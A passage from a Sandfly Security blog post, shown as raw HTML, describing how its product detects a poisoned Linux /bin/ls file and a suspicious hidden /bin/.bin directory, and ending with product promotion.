...</code></pre><p>That’s an alert on a weird hidden directory under <em>/bin/.bin</em> with a creation time identical to our malicious <em>ls</em>.</p><p>Hidden directories under system binary areas are very suspicious. If you missed this when looking at that <em>ls</em> output, you can be sure Sandfly didn’t. Sandfly is very good at seeing suspicious activity like this.</p><p>Let’s look first at the hidden directory:</p><div class="MuiBox-root css-1qm1lh"><div class="ss--image ss--image--elevated ss--image--width-medium ss--image--lightbox"><div data-gatsby-image-wrapper="" class="gatsby-image-wrapper gatsby-image-wrapper-constrained ss--image__image"><div style="max-width:768px;display:block"><img alt="" role="presentation" aria-hidden="true" src="data:image/svg+xml;charset=utf-8,%3Csvg height=&#x27;424&#x27; width=&#x27;768&#x27; xmlns=&#x27;http://www.w3.org/2000/svg&#x27; version=&#x27;1.1&#x27;%3E%3C/svg%3E" style="max-width:100%;display:block;position:static"/></div><img aria-hidden="true" data-placeholder-image="" style="opacity:1;transition:opacity 500ms linear" decoding="async" src="" alt=""/><img data-gatsby-image-ssr="" data-main-image="" style="opacity:0" sizes="(min-width: 768px) 768px, 100vw" decoding="async" loading="lazy" data-src="https://www.datocms-assets.com/56687/1635216314-poisoned-linux-binary-hidden-directory.png?auto=format&amp;fit=crop&amp;w=768" data-srcset="https://www.datocms-assets.com/56687/1635216314-poisoned-linux-binary-hidden-directory.png?auto=format&amp;dpr=0.25&amp;fit=crop&amp;w=768 192w,https://www.datocms-assets.com/56687/1635216314-poisoned-linux-binary-hidden-directory.png?auto=format&amp;dpr=0.5&amp;fit=crop&amp;w=768 384w,https://www.datocms-assets.com/56687/1635216314-poisoned-linux-binary-hidden-directory.png?auto=format&amp;fit=crop&amp;w=768 768w" alt="Poisoned Linux Binary Hidden Directory"/><noscript><img data-gatsby-image-ssr="" data-main-image="" style="opacity:0" sizes="(min-width: 768px) 768px, 100vw" decoding="async" loading="lazy" src="https://www.datocms-assets.com/56687/1635216314-poisoned-linux-binary-hidden-directory.png?auto=format&amp;fit=crop&amp;w=768" srcSet="https://www.datocms-assets.com/56687/1635216314-poisoned-linux-binary-hidden-directory.png?auto=format&amp;dpr=0.25&amp;fit=crop&amp;w=768 192w,https://www.datocms-assets.com/56687/1635216314-poisoned-linux-binary-hidden-directory.png?auto=format&amp;dpr=0.5&amp;fit=crop&amp;w=768 384w,https://www.datocms-assets.com/56687/1635216314-poisoned-linux-binary-hidden-directory.png?auto=format&amp;fit=crop&amp;w=768 768w" alt="Poisoned Linux Binary Hidden Directory"/></noscript><script type="module">const t="undefined"!=typeof HTMLImageElement&&"loading"in HTMLImageElement.prototype;if(t){const t=document.querySelectorAll("img[data-main-image]");for(let e of t){e.dataset.src&&(e.setAttribute("src",e.dataset.src),e.removeAttribute("data-src")),e.dataset.srcset&&(e.setAttribute("srcset",e.dataset.srcset),e.removeAttribute("data-srcset"));const t=e.parentNode.querySelectorAll("source[data-srcset]");for(let e of t)e.setAttribute("srcset",e.dataset.srcset),e.removeAttribute("data-srcset");e.complete&&(e.style.opacity=1,e.parentNode.parentNode.querySelector("[data-placeholder-image]").style.opacity=0)}}</script></div><div class="ss--image__zoom"><button class="MuiButtonBase-root MuiIconButton-root MuiIconButton-colorInherit MuiIconButton-sizeMedium css-1deacqj" tabindex="0" type="button"><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 512 512" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg"><path d="M505 442.7L405.3 343c-4.5-4.5-10.6-7-17-7H372c27.6-35.3 44-79.7 44-128C416 93.1 322.9 0 208 0S0 93.1 0 208s93.1 208 208 208c48.3 0 92.7-16.4 128-44v16.3c0 6.4 2.5 12.5 7 17l99.7 99.7c9.4 9.4 24.6 9.4 33.9 0l28.3-28.3c9.4-9.4 9.4-24.6.1-34zM208 336c-70.7 0-128-57.2-128-128 0-70.7 57.2-128 128-128 70.7 0 128 57.2 128 128 0 70.7-57.2 128-128 128z"></path></svg></button></div></div></div><p>That’s pretty straightforward. There is a hidden directory under <em>/bin</em> that looks really strange. Now let’s look at the main alarm:</p><div class="MuiBox-root css-1qm1lh"><div class="ss--image ss--image--elevated ss--image--width-medium ss--image--lightbox"><div data-gatsby-image-wrapper="" class="gatsby-image-wrapper gatsby-image-wrapper-constrained ss--image__image"><div style="max-width:768px;display:block"><img alt="" role="presentation" aria-hidden="true" src="data:image/svg+xml;charset=utf-8,%3Csvg height=&#x27;430&#x27; width=&#x27;768&#x27; xmlns=&#x27;http://www.w3.org/2000/svg&#x27; version=&#x27;1.1&#x27;%3E%3C/svg%3E" style="max-width:100%;display:block;position:static"/></div><img aria-hidden="true" data-placeholder-image="" style="opacity:1;transition:opacity 500ms linear" decoding="async" src="" alt=""/><img data-gatsby-image-ssr="" data-main-image="" style="opacity:0" sizes="(min-width: 768px) 768px, 100vw" decoding="async" loading="lazy" data-src="https://www.datocms-assets.com/56687/1635216322-poisoned-linux-binary-sandfly-alert.png?auto=format&amp;fit=crop&amp;w=768" data-srcset="https://www.datocms-assets.com/56687/1635216322-poisoned-linux-binary-sandfly-alert.png?auto=format&amp;dpr=0.25&amp;fit=crop&amp;w=768 192w,https://www.datocms-assets.com/56687/1635216322-poisoned-linux-binary-sandfly-alert.png?auto=format&amp;dpr=0.5&amp;fit=crop&amp;w=768 384w,https://www.datocms-assets.com/56687/1635216322-poisoned-linux-binary-sandfly-alert.png?auto=format&amp;fit=crop&amp;w=768 768w" alt="Poisoned Linux Binary Sandfly Alert"/><noscript><img data-gatsby-image-ssr="" data-main-image="" style="opacity:0" sizes="(min-width: 768px) 768px, 100vw" decoding="async" loading="lazy" src="https://www.datocms-assets.com/56687/1635216322-poisoned-linux-binary-sandfly-alert.png?auto=format&amp;fit=crop&amp;w=768" srcSet="https://www.datocms-assets.com/56687/1635216322-poisoned-linux-binary-sandfly-alert.png?auto=format&amp;dpr=0.25&amp;fit=crop&amp;w=768 192w,https://www.datocms-assets.com/56687/1635216322-poisoned-linux-binary-sandfly-alert.png?auto=format&amp;dpr=0.5&amp;fit=crop&amp;w=768 384w,https://www.datocms-assets.com/56687/1635216322-poisoned-linux-binary-sandfly-alert.png?auto=format&amp;fit=crop&amp;w=768 768w" alt="Poisoned Linux Binary Sandfly Alert"/></noscript><script type="module">const t="undefined"!=typeof HTMLImageElement&&"loading"in HTMLImageElement.prototype;if(t){const t=document.querySelectorAll("img[data-main-image]");for(let e of t){e.dataset.src&&(e.setAttribute("src",e.dataset.src),e.removeAttribute("data-src")),e.dataset.srcset&&(e.setAttribute("srcset",e.dataset.srcset),e.removeAttribute("data-srcset"));const t=e.parentNode.querySelectorAll("source[data-srcset]");for(let e of t)e.setAttribute("srcset",e.dataset.srcset),e.removeAttribute("data-srcset");e.complete&&(e.style.opacity=1,e.parentNode.parentNode.querySelector("[data-placeholder-image]").style.opacity=0)}}</script></div><div class="ss--image__zoom"><button class="MuiButtonBase-root MuiIconButton-root MuiIconButton-colorInherit MuiIconButton-sizeMedium css-1deacqj" tabindex="0" type="button"><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 512 512" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg"><path d="M505 442.7L405.3 343c-4.5-4.5-10.6-7-17-7H372c27.6-35.3 44-79.7 44-128C416 93.1 322.9 0 208 0S0 93.1 0 208s93.1 208 208 208c48.3 0 92.7-16.4 128-44v16.3c0 6.4 2.5 12.5 7 17l99.7 99.7c9.4 9.4 24.6 9.4 33.9 0l28.3-28.3c9.4-9.4 9.4-24.6.1-34zM208 336c-70.7 0-128-57.2-128-128 0-70.7 57.2-128 128-128 70.7 0 128 57.2 128 128 0 70.7-57.2 128-128 128z"></path></svg></button></div></div></div><p>Here’s the star attraction. The binary <em>/bin/ls</em> is in fact not a binary at all. It’s an unknown type (text in this case). Sandfly also gives you the file creation times and other data to help you narrow down exactly when it happened and what accounts may have been involved.</p><p>You now have enough information to begin an investigation on this box. But more</p><h2>Dormant vs. Active Attacks</h2><p>File binary poisoning is a classic case of a dormant attack. This is a lot different than something active on your host like a malicious process. Dormant attacks just lie around like a booby trap waiting to go off. They are very good at going unnoticed because they are not doing anything suspicious until run.</p><p>Sandfly always searches for both active and dormant attacks. The latest Sandfly update 1.1.18 is able to spot binary poisoning before it becomes a major headache now as well.</p><p>Time is your enemy when your systems are compromised. Sandfly has checks in the standard rotation that constantly look for things out of place like poisoned binaries or suspicious directories. We hunt for intruders 24 hours a day on your Linux hosts for you. Best of all, we do it without needing to load agents on your endpoints by using our agentless technology. <a href="/product/why-sandfly/">Learn more today</a></p><hr/><div class="ss--spacer "></div></div><div class="ss--content ss--content--gutters ss--content--text-align-left ss--content--width-small"><div class="ss--share"><h4 class="ss--share__heading">Share this:</h4><div class="ss--share__icons"><button aria-label="facebook" class="react-share__ShareButton" style="background-color:transparent;border:none;padding:0;font:inherit;color:inherit;cursor:pointer"><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 448 512" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg"><path d="M400 32H48A48 48 0 0 0 0 80v352a48 48 0 0 0 48 48h137.25V327.69h-63V256h63v-54.64c0-62.15 37-96.48 93.67-96.48 27.14 0 55.52 4.84 55.52 4.84v61h-31.27c-30.81 0-40.42 19.12-40.42 38.73V256h68.78l-11 71.69h-57.78V480H400a48 48 0 0 0 48-48V80a48 48 0 0 0-48-48z"></path></svg></button><button aria-label="linkedin" class="react-share__ShareButton" style="background-color:transparent;border:none;padding:0;font:inherit;color:inherit;cursor:pointer"><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 448 512" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg"><path d="M416 32H31.9C14.3 32 0 46.5 0 64.3v383.4C0 465.5 14.3 480 31.9 480H416c17.6 0 32-14.5 32-32.3V64.3c0-17.8-14.4-32.3-32-32.3zM135.4 416H69V202.2h66.5V416zm-33.2-243c-21.3 0-38.5-17.3-38.5-38.5S80.9 96 102.2 96c21.2 0 38.5 17.3 38.5 38.5 0 21.3-17.2 38.5-38.5 38.5zm282.1 243h-66.4V312c0-24.8-.5-56.7-34.5-56.7-34.6 0-39.9 27-39.9 54.9V416h-66.4V202.2h63.7v29.2h.9c8.9-16.8 30.6-34.5 62.9-34.5 67.2 0 79.7 44.3 79.7 101.9V416z"></path></svg></button><button aria-label="twitter" class="react-share__ShareButton" style="background-color:transparent;border:none;padding:0;font:inherit;color:inherit;cursor:pointer"><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 448 512" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg"><path d="M400 32H48C21.5 32 0 53.5 0 80v352c0 26.5 21.5 48 48 48h352c26.5 0 48-21.5 48-48V80c0-26.5-21.5-48-48-48zm-48.9 158.8c.2 2.8.2 5.7.2 8.5 0 86.7-66 186.6-186.6 186.6-37.2 0-71.7-10.8-100.7-29.4 5.3.6 10.4.8 15.8.8 30.7 0 58.9-10.4 81.4-28-28.8-.6-53-19.5-61.3-45.5 10.1 1.5 19.2 1.5 29.6-1.2-30-6.1-52.5-32.5-52.5-64.4v-.8c8.7 4.9 18.9 7.9 29.6 8.3a65.447 65.447 0 0 1-29.2-54.6c0-12.2 3.2-23.4 8.9-33.1 32.3 39.8 80.8 65.8 135.2 68.6-9.3-44.5 24-80.6 64-80.6 18.9 0 35.9 7.9 47.9 20.7 14.8-2.8 29-8.3 41.6-15.8-4.9 15.2-15.2 28-28.8 36.1 13.2-1.4 26-5.1 37.8-10.2-8.9 13.1-20.1 24.7-32.9 34z"></path></svg></button></div></div></div><div class="ss--spacer ss--spacer--padding-double"></div><div class="ss--cta ss--cta--variant-default ss--cta--color-primaryGradient"><div class="ss--cta__sizer"><div class="ss--cta__content"><h2>Let Sandfly keep your Linux systems secure.</h2><a class="ss--button ss--button--alignment-center ss--button--color-white ss--button--elevated ss--button--style-bordered ss--button--size-default" href="/get-sandfly/"><span>Learn More</span></a></div></div></div></main></div><footer class="ss--footer"><div class="ss--footer__container"><div class="ss--footer__wrapper"><div class="ss--footer__menu"><div class="ss--footer__menu-heading"><h4>Contact Us</h4></div><ul><li><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 24 24" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg"><path fill="none" d="M0 0h24v24H0z"></path><path d="M6.62 10.79c1.44 2.83 3.76 5.14 6.59 6.59l2.2-2.2c.27-.27.67-.36 1.02-.24 1.12.37 2.33.57 3.57.57.55 0 1 .45 1 1V20c0 .55-.45 1-1 1-9.39 0-17-7.61-17-17 0-.55.45-1 1-1h3.5c.55 0 1 .45 1 1 0 1.25.2 2.45.57 3.57.11.35.03.74-.25 1.02l-2.2 2.2z"></path></svg><a href="tel:+64 3 3792313">+64 3 3792313</a></li><li><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 24 24" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg"><path fill="none" d="M0 0h24v24H0z"></path><path d="M20.5 3l-.16.03L15 5.1 9 3 3.36 4.9c-.21.07-.36.25-.36.48V20.5c0 .28.22.5.5.5l.16-.03L9 18.9l6 2.1 5.64-1.9c.21-.07.36-.25.36-.48V3.5c0-.28-.22-.5-.5-.5zM15 19l-6-2.11V5l6 2.11V19z"></path></svg><a href="https://goo.gl/maps/9cFto1o6GNa9RK6S9" target="_blank" rel="noopener noreferrer">4 Ash Street Christchurch, New Zealand 8011</a></li></ul></div><div class="ss--footer__menu"><div class="ss--footer__menu-heading"><h4>Product Navigation</h4></div><ul><li><a href="/platform/why-sandfly/">Why Sandfly?</a></li><li><a href="/platform/how-sandfly-works/">How Sandfly Works</a></li><li><a href="/platform/ssh-credential-security/">SSH Key Auditing</a></li><li><a href="/platform/threats-detected/">Linux Threats Detected</a></li><li><a href="/platform/walk-through/">Walk Through</a></li></ul></div><div class="ss--footer__menu"><div class="ss--footer__menu-heading"><h4>General Navigation</h4></div><ul><li><a href="/about-us/our-story/">Our Story</a></li><li><a href="/about-us/partner/">Partners and MSSPs</a></li><li><a href="/under-attack/">Under Attack? </a></li><li><a href="/contact-us/">Contact Us </a></li></ul></div><div class="ss--footer__menu"><div class="ss--footer__menu-heading"><h4>Keep in Touch</h4></div><form class='ss--form' id='Newsletter' method='POST' name='Newsletter'><div style="opacity:1;transform:none"><div><fieldset><input type="hidden" name="form-name" value="Newsletter"/><div class="ss--input "><label for="input--firstName">First Name<span area-label="required">*</span></label><input id="input--firstName" name="firstName" placeholder="First Name" required="" type="text"/></div><div class="ss--input "><label for="input--lastName">Last Name<span area-label="required">*</span></label><input id="input--lastName" name="lastName" placeholder="Last Name" required="" type="text"/></div><div class="ss--input "><label for="input--emailAddress">Email Address<span area-label="required">*</span></label><input id="input--emailAddress" name="emailAddress" placeholder="Email Address" required="" type="email"/></div><button type="submit" class="ss--button ss--button--alignment-left ss--button--color-default ss--button--elevated ss--button--style-bordered ss--button--size-default ss--button--width-full"><span>Submit</span></button></fieldset></div></div></form></div><div class="ss--footer__menu"><div class="ss--footer__menu-heading"><h4>Connect With Us</h4></div><ul class="ss--footer__social"><li><a title="Twitter" target="_blank" rel="noopener noreferrer" href="https://twitter.com/sandflysecurity"><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 512 512" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg"><path d="M459.37 151.716c.325 4.548.325 9.097.325 13.645 0 138.72-105.583 298.558-298.558 298.558-59.452 0-114.68-17.219-161.137-47.106 8.447.974 16.568 1.299 25.34 1.299 49.055 0 94.213-16.568 130.274-44.832-46.132-.975-84.792-31.188-98.112-72.772 6.498.974 12.995 1.624 19.818 1.624 9.421 0 18.843-1.3 27.614-3.573-48.081-9.747-84.143-51.98-84.143-102.985v-1.299c13.969 7.797 30.214 12.67 47.431 13.319-28.264-18.843-46.781-51.005-46.781-87.391 0-19.492 5.197-37.36 14.294-52.954 51.655 63.675 129.3 105.258 216.365 109.807-1.624-7.797-2.599-15.918-2.599-24.04 0-57.828 46.782-104.934 104.934-104.934 30.213 0 57.502 12.67 76.67 33.137 23.715-4.548 46.456-13.32 66.599-25.34-7.798 24.366-24.366 44.833-46.132 57.827 21.117-2.273 41.584-8.122 60.426-16.243-14.292 20.791-32.161 39.308-52.628 54.253z"></path></svg></a></li><li><a title="Linkedin" target="_blank" rel="noopener noreferrer" href="https://nz.linkedin.com/company/sandfly"><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 448 512" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg"><path d="M416 32H31.9C14.3 32 0 46.5 0 64.3v383.4C0 465.5 14.3 480 31.9 480H416c17.6 0 32-14.5 32-32.3V64.3c0-17.8-14.4-32.3-32-32.3zM135.4 416H69V202.2h66.5V416zm-33.2-243c-21.3 0-38.5-17.3-38.5-38.5S80.9 96 102.2 96c21.2 0 38.5 17.3 38.5 38.5 0 21.3-17.2 38.5-38.5 38.5zm282.1 243h-66.4V312c0-24.8-.5-56.7-34.5-56.7-34.6 0-39.9 27-39.9 54.9V416h-66.4V202.2h63.7v29.2h.9c8.9-16.8 30.6-34.5 62.9-34.5 67.2 0 79.7 44.3 79.7 101.9V416z"></path></svg></a></li><li><a title="RSS" target="_blank" rel="noopener noreferrer" href="/blog/rss.xml"><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 448 512" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg"><path d="M128.081 415.959c0 35.369-28.672 64.041-64.041 64.041S0 451.328 0 415.959s28.672-64.041 64.041-64.041 64.04 28.673 64.04 64.041zm175.66 47.25c-8.354-154.6-132.185-278.587-286.95-286.95C7.656 175.765 0 183.105 0 192.253v48.069c0 8.415 6.49 15.472 14.887 16.018 111.832 7.284 201.473 96.702 208.772 208.772.547 8.397 7.604 14.887 16.018 14.887h48.069c9.149.001 16.489-7.655 15.995-16.79zm144.249.288C439.596 229.677 251.465 40.445 16.503 32.01 7.473 31.686 0 38.981 0 48.016v48.068c0 8.625 6.835 15.645 15.453 15.999 191.179 7.839 344.627 161.316 352.465 352.465.353 8.618 7.373 15.453 15.999 15.453h48.068c9.034-.001 16.329-7.474 16.005-16.504z"></path></svg></a></li><li><a title="Youtube" target="_blank" rel="noopener noreferrer" href="https://www.youtube.com/channel/UCA1Pai8A76DYlB6xJg8yinw"><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 576 512" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg"><path d="M549.655 124.083c-6.281-23.65-24.787-42.276-48.284-48.597C458.781 64 288 64 288 64S117.22 64 74.629 75.486c-23.497 6.322-42.003 24.947-48.284 48.597-11.412 42.867-11.412 132.305-11.412 132.305s0 89.438 11.412 132.305c6.281 23.65 24.787 41.5 48.284 47.821C117.22 448 288 448 288 448s170.78 0 213.371-11.486c23.497-6.321 42.003-24.171 48.284-47.821 11.412-42.867 11.412-132.305 11.412-132.305s0-89.438-11.412-132.305zm-317.51 213.508V175.185l142.739 81.205-142.739 81.201z"></path></svg></a></li></ul></div></div><div class="ss--copyright"><p>© 2023 Sandfly Security, Ltd. <a class="ss--copyright__link" href="/privacy-policy/">Terms &amp; Privacy Policy.</a>This site is protected by reCAPTCHA and the Google <a href="https://policies.google.com/privacy">Privacy Policy</a> and <a href="https://policies.google.com/terms">Terms of Service</a> apply.</p><a href="https://www.veracode.com/verified/directory/sandfly-security" target="_blank" class="ss--copyright__veracode"><div data-gatsby-image-wrapper="" style="width:160px;height:42px" class="gatsby-image-wrapper"><img aria-hidden="true" data-placeholder-image="" style="opacity:1;transition:opacity 500ms linear" decoding="async" src="" alt=""/><picture><source type="image/webp" data-srcset="/static/def5f87d09d30b9c8b91161e528ff39e/b5387/veracode-verified-standard-white.webp 160w,/static/def5f87d09d30b9c8b91161e528ff39e/30b5b/veracode-verified-standard-white.webp 320w" sizes="160px"/><img data-gatsby-image-ssr="" layout="fixed" data-main-image="" style="opacity:0" sizes="160px" decoding="async" loading="lazy" data-src="/static/def5f87d09d30b9c8b91161e528ff39e/759ad/veracode-verified-standard-white.png" data-srcset="/static/def5f87d09d30b9c8b91161e528ff39e/759ad/veracode-verified-standard-white.png 160w,/static/def5f87d09d30b9c8b91161e528ff39e/8eaa7/veracode-verified-standard-white.png 320w" alt="Veracode Verified Standard"/></picture><noscript><picture><source type="image/webp" srcSet="/static/def5f87d09d30b9c8b91161e528ff39e/b5387/veracode-verified-standard-white.webp 160w,/static/def5f87d09d30b9c8b91161e528ff39e/30b5b/veracode-verified-standard-white.webp 320w" sizes="160px"/><img data-gatsby-image-ssr="" layout="fixed" data-main-image="" style="opacity:0" sizes="160px" decoding="async" loading="lazy" src="/static/def5f87d09d30b9c8b91161e528ff39e/759ad/veracode-verified-standard-white.png" srcSet="/static/def5f87d09d30b9c8b91161e528ff39e/759ad/veracode-verified-standard-white.png 160w,/static/def5f87d09d30b9c8b91161e528ff39e/8eaa7/veracode-verified-standard-white.png 320w" alt="Veracode Verified Standard"/></picture></noscript><script type="module">const t="undefined"!=typeof HTMLImageElement&&"loading"in HTMLImageElement.prototype;if(t){const t=document.querySelectorAll("img[data-main-image]");for(let e of t){e.dataset.src&&(e.setAttribute("src",e.dataset.src),e.removeAttribute("data-src")),e.dataset.srcset&&(e.setAttribute("srcset",e.dataset.srcset),e.removeAttribute("data-srcset"));const t=e.parentNode.querySelectorAll("source[data-srcset]");for(let e of t)e.setAttribute("srcset",e.dataset.srcset),e.removeAttribute("data-srcset");e.complete&&(e.style.opacity=1,e.parentNode.parentNode.querySelector("[data-placeholder-image]").style.opacity=0)}}</script></div></a></div></div></footer></div></div><div id="gatsby-announcer" style="position:absolute;top:0;width:1px;height:1px;padding:0;overflow:hidden;clip:rect(0, 0, 0, 0);white-space:nowrap;border:0" aria-live="assertive" aria-atomic="true"></div></div><script async="" src="https://www.googletagmanager.com/gtag/js?id=G-D2N4MNQFQ1"></script><script>
      
      
      if(!(navigator.doNotTrack == "1" || window.doNotTrack == "1")) {
        window.dataLayer = window.dataLayer || [];
        function gtag(){dataLayer.push(arguments);}
        gtag('js', new Date());

        gtag('config', 'G-D2N4MNQFQ1', {"send_page_view":false});
      }
      </script><script type="text/javascript" id="hs-script-loader" async="" defer="" src="//js.hs-scripts.com/4661162.js">var _hsq = window._hsq = window._hsq || [];_hsq.push(['setPath', window.location.pathname + window.location.search + window.location.hash]);if (window.doNotTrack || navigator.doNotTrack || navigator.msDoNotTrack || 'msTrackingProtectionEnabled' in window.external) {if (window.doNotTrack == "1" || navigator.doNotTrack == "yes" || navigator.doNotTrack == "1" || navigator.msDoNotTrack == "1" || window.external.msTrackingProtectionEnabled()) {_hsq.push(['doNotTrack']);}}</script><script id="gatsby-script-loader">/*<![CDATA[*/window.pagePath="/blog/detecting-linux-binary-file-poisoning/";/*]]>*/</script><!-- slice-start id="_gatsby-scripts-1" -->
          <script
            id="gatsby-chunk-mapping"
          >
            window.___chunkMapping="{\"app\":[\"/app-e6b1a659e3a959aa1023.js\"],\"component---src-templates-case-studies-tsx\":[\"/component---src-templates-case-studies-tsx-eb7957a4194c0680d8db.js\"],\"component---src-templates-case-study-tsx\":[\"/component---src-templates-case-study-tsx-e129649ac58eaec7bb81.js\"],\"component---src-templates-page-tsx\":[\"/component---src-templates-page-tsx-d9ec6e840348459519db.js\"],\"component---src-templates-post-list-tsx\":[\"/component---src-templates-post-list-tsx-cfbd2e13740298afcb6d.js\"],\"component---src-templates-post-tag-tsx\":[\"/component---src-templates-post-tag-tsx-8d2da892b0fa5bf37928.js\"],\"component---src-templates-post-tsx\":[\"/component---src-templates-post-tsx-588dc5d40340fd33a183.js\"],\"component---src-templates-pricing-tsx\":[\"/component---src-templates-pricing-tsx-24387323a4fd753e3698.js\"],\"component---src-templates-styleguide-tsx\":[\"/component---src-templates-styleguide-tsx-606a11c604538e9d4fe6.js\"],\"reactPlayerYouTube\":[\"/reactPlayerYouTube-56d1e47326c7016121a5.js\"],\"reactPlayerSoundCloud\":[\"/reactPlayerSoundCloud-520c1220ab5cbeaf29cc.js\"],\"reactPlayerVimeo\":[\"/reactPlayerVimeo-dea765e8b7cbdebad544.js\"],\"reactPlayerFacebook\":[\"/reactPlayerFacebook-f2624368055531987f69.js\"],\"reactPlayerStreamable\":[\"/reactPlayerStreamable-b6e953a4971401f8bacd.js\"],\"reactPlayerWistia\":[\"/reactPlayerWistia-bcd237c4497ed7dd0d0a.js\"],\"reactPlayerTwitch\":[\"/reactPlayerTwitch-623248076092e44514e7.js\"],\"reactPlayerDailyMotion\":[\"/reactPlayerDailyMotion-f9716f4e57c809afa9d2.js\"],\"reactPlayerMixcloud\":[\"/reactPlayerMixcloud-02e5041c7860111f2026.js\"],\"reactPlayerVidyard\":[\"/reactPlayerVidyard-c1cb78e96c5e2b3679fa.js\"],\"reactPlayerKaltura\":[\"/reactPlayerKaltura-0159ae2ffefacb826ce7.js\"],\"reactPlayerFilePlayer\":[\"/reactPlayerFilePlayer-b9de0dd48c59c6c5edf9.js\"],\"reactPlayerPreview\":[\"/reactPlayerPreview-ac6568183a68f919d2f2.js\"]}";
          </script>
        <script>window.___webpackCompilationHash="3a0881400232673adf7f";</script><script src="/webpack-runtime-b3b2861a827210b746f6.js" async></script><script src="/framework-0cc267bd872c71b5bfc0.js" async></script><script src="/app-e6b1a659e3a959aa1023.js" async></script><!-- slice-end id="_gatsby-scripts-1" --></body></html>